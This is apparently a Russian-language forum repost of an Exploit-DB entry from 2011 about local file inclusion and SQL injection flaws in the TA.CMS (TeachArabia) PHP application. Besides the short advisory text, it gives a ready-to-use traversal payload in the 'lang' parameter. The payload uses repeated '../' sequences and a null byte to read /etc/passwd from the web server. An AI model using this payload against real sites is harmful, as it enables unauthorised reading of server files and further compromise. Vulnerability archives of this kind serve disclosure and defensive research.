Exploit TA.CMS (TeachArabia) - 'lang' Traversal Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
36329
Проверка EDB
  1. Пройдено
Автор
COBRA_21
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2011-11-22
TA.CMS (TeachArabia) - 'lang' Traversal Local File Inclusion
Код:
source: https://www.securityfocus.com/bid/50773/info
 
TA.CMS is prone to multiple local file-include and SQL-injection vulnerabilities.
 
An attacker can exploit these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and view and execute arbitrary local files within the context of the webserver.
 
http://www.example.com/?lang=../../../../../../../../../../../../../../../etc/passwd%00.png&p_id=60
 
Источник
www.exploit-db.com

Похожие темы